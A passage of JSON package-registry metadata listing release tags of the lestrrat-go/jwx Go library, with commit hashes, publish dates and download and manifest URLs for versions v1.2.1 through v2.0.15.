0.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15/manifests"},{"name":"v2.0.14","sha":"42d47a75de7858fc60492f617a6ec4a9eda7d8dd","kind":"commit","published_at":"2023-10-17T00:54:09.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14/manifests"},{"name":"v2.0.13","sha":"be93b3f4afa02a079e3f2ca94da6a29e828cc4ed","kind":"commit","published_at":"2023-09-26T09:15:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13/manifests"},{"name":"v2.0.12","sha":"466c2774000a594f12a57dcf788be4e58e83ce04","kind":"commit","published_at":"2023-08-10T02:55:19.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12/manifests"},{"name":"v2.0.11","sha":"6c41e3822485fc7e11dd70b4b0524b075d66b103","kind":"commit","published_at":"2023-06-14T08:15:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11/manifests"},{"name":"v1.2.26","sha":"d9ddbc8e5009cfdd8c28413390b67afa7f576dd6","kind":"commit","published_at":"2023-06-14T08:09:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.26","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26/manifests"},{"name":"v2.0.10","sha":"8840ffd4afc5839f591ff0e9ba9034af52b1643e","kind":"commit","published_at":"2023-06-12T07:24:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10/manifests"},{"name":"v2.0.9","sha":"fccc52457a90ce00d625c3ed8d5d3443e903a91b","kind":"commit","published_at":"2023-03-21T03:29:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9/manifests"},{"name":"v2.0.8","sha":"7803b82f35c80ed24b6d8b730a11983f751904b8","kind":"commit","published_at":"2022-11-25T00:58:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8/manifests"},{"name":"v2.0.7","sha":"6e8e91832b11d1d13f53b5e0b9a49fcd10db1f27","kind":"commit","published_at":"2022-11-15T01:54:59.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7/manifests"},{"name":"v2.0.6","sha":"92950642291a3af54c5f1455ec68e76b390587ae","kind":"commit","published_at":"2022-08-25T13:19:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"c599c15c345121b1223fb7a744eaa07fdfe5e95e","kind":"commit","published_at":"2022-08-11T00:18:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"21f292826bf5f4cb76be98dcdfef9ce635835b5e","kind":"commit","published_at":"2022-07-19T05:24:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"650fe90d166ba9ada98474be3b9f6450701ffb71","kind":"commit","published_at":"2022-06-13T12:26:04.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"dc603b6e88971ce0c477c48fd8b77e84ffefb169","kind":"commit","published_at":"2022-05-23T12:58:39.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2/manifests"},{"name":"v1.2.25","sha":"ad8c29d1628435cdad008b5cbbfbe75f5bfc74ae","kind":"commit","published_at":"2022-05-23T12:48:33.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.25","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25/manifests"},{"name":"v2.0.1","sha":"0d365e4523faae8e9f3bbcbd5bc3a09cab951d49","kind":"commit","published_at":"2022-05-06T00:39:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1/manifests"},{"name":"v1.2.24","sha":"e38f677839edbeae5480e993d73eacb94f7af581","kind":"commit","published_at":"2022-05-05T01:00:31.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.24","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24/manifests"},{"name":"v2.0.0","sha":"8f97f606570bc3de90005ce3188824e7e7eff88a","kind":"commit","published_at":"2022-04-24T04:18:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0/manifests"},{"name":"v2.0.0-beta2","sha":"fd8fafc9fe0a7310d9dec456168a452d571c16b0","kind":"commit","published_at":"2022-04-16T06:50:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2/manifests"},{"name":"v1.2.23","sha":"baba5610e7fb53402e23c955edc10dbb25d73275","kind":"commit","published_at":"2022-04-13T09:52:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.23","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23/manifests"},{"name":"v2.0.0-beta1","sha":"0258045345942aed8b8694da94cfb5ab4dd3261c","kind":"commit","published_at":"2022-04-09T13:16:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1/manifests"},{"name":"v1.2.22","sha":"f4701e19d38b7fd1ede0ef785867e078016b516e","kind":"commit","published_at":"2022-04-08T11:18:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.22","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22/manifests"},{"name":"v2.0.0-alpha1","sha":"8a69aa2dd6b9a7a8284584cdd23acd96613c0866","kind":"commit","published_at":"2022-04-03T23:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1/manifests"},{"name":"v1.2.21","sha":"7b28f4c7fabe44249b77e058e5ca33c82b599d5e","kind":"commit","published_at":"2022-03-29T22:49:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21/manifests"},{"name":"v1.2.20","sha":"3fa12c9bedcebd03db23f61cfb65ae0b040bf211","kind":"commit","published_at":"2022-03-03T05:56:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20/manifests"},{"name":"v1.2.19","sha":"1c0a87feccf45c59a54ee3c9f2a995ab777953e7","kind":"commit","published_at":"2022-02-22T01:40:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19/manifests"},{"name":"v1.2.18","sha":"2ab72de258ac966aeec3cfb836209692ed345586","kind":"commit","published_at":"2022-01-23T00:22:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18/manifests"},{"name":"v1.2.17","sha":"300b79a15b99559ba7ad22e4275ecc99a07c359b","kind":"commit","published_at":"2022-01-12T10:10:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17/manifests"},{"name":"v1.2.16","sha":"9349cc843391834794d593c4daa1345de1ab357e","kind":"commit","published_at":"2022-01-12T05:29:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16/manifests"},{"name":"v1.2.15","sha":"5ded25fd0bf8f759a96a7ae3937df829d8e4777d","kind":"commit","published_at":"2022-01-06T23:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15/manifests"},{"name":"v1.2.14","sha":"de7d9bca43812abc4f630320f8632108ccfe34bf","kind":"commit","published_at":"2021-12-22T01:34:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14/manifests"},{"name":"v1.2.13","sha":"59f4c03c3e0aeb44f6b6a57fd96b90f9a679f880","kind":"commit","published_at":"2021-12-07T02:59:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13/manifests"},{"name":"v1.2.12","sha":"45e532bbe4ada174b16f5f170ea62d2c8d83ef77","kind":"commit","published_at":"2021-12-01T06:52:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12/manifests"},{"name":"v1.2.11","sha":"e371adc10f659fa05b064274ff549a8e0353d2b6","kind":"commit","published_at":"2021-11-13T15:34:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11/manifests"},{"name":"v1.2.10","sha":"09a4d070eb0ec840a33597a67a17e6cddb53da87","kind":"commit","published_at":"2021-11-09T09:16:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10/manifests"},{"name":"v1.2.9","sha":"b2da2238b7b342a8889470b901ef3024dfc0712a","kind":"commit","published_at":"2021-10-26T01:00:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9/manifests"},{"name":"v1.2.8","sha":"f2bdd8c9df46d61fe987fa36bcc87c58ef846046","kind":"commit","published_at":"2021-10-21T01:23:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8/manifests"},{"name":"v1.2.7","sha":"b9292016a6572dce779109d8da8d813b85abb658","kind":"commit","published_at":"2021-09-26T06:08:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7/manifests"},{"name":"v1.2.6","sha":"41b30b67e905482292496e528119fc7482482ab3","kind":"commit","published_at":"2021-08-24T07:56:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6/manifests"},{"name":"v1.2.5","sha":"551083cda79fd07493bf0db6e825278dd88c1fc3","kind":"commit","published_at":"2021-08-04T12:17:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5/manifests"},{"name":"v1.2.4","sha":"d01528f5e5ae3221a48f67570928867e98184bbd","kind":"commit","published_at":"2021-07-15T13:26:23.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4/manifests"},{"name":"v1.2.3","sha":"5e2de6ea11b5112bdf1a5e088d56c9c2e7fb6807","kind":"commit","published_at":"2021-07-15T09:53:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3/manifests"},{"name":"v1.2.2","sha":"7159c501c5a43f8788f3a9a0961e146480c28eae","kind":"commit","published_at":"2021-07-12T23:38:00.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2/manifests"},{"name":"v1.2.1","sha":"08de34253bc9633a11b019b143a2d212f8ff0ed8","kind":"commit","published_at":"2021-06-01T23:24:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1